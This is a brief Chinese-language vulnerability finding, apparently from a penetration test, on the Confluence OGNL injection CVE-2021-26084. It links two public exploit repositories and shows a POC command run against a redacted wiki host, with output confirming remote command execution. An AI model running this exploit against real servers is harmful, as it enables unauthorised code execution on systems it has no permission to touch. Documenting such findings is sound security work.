0x0 风险问题
参考注入代码:
https://github.com/0xf4n9x/CVE-2021-26084
https://github.com/h3v0x/CVE-2021-26084_Confluence/
注入POC:
python3 POC.py -u "https://wiki.xxx.com" -e pwd
回显结果:
[+] https://wiki.xxx.com/pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
/home/wiki/confluence/bin